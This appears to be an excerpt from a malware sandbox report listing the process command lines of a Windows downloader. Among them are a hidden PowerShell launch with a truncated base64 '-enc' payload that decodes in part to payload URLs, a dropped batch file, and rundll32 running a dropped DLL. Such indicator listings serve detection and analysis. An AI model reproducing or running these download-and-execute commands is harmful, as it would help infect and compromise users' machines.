Technical Information
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWAD...
- %ALLUSERSPROFILE%\vkwer.bat
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWAD...' (with hidden window)
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWADIATQAvACwAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeQBlAGEAbABk...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\vbkwk.dll,dhSGert3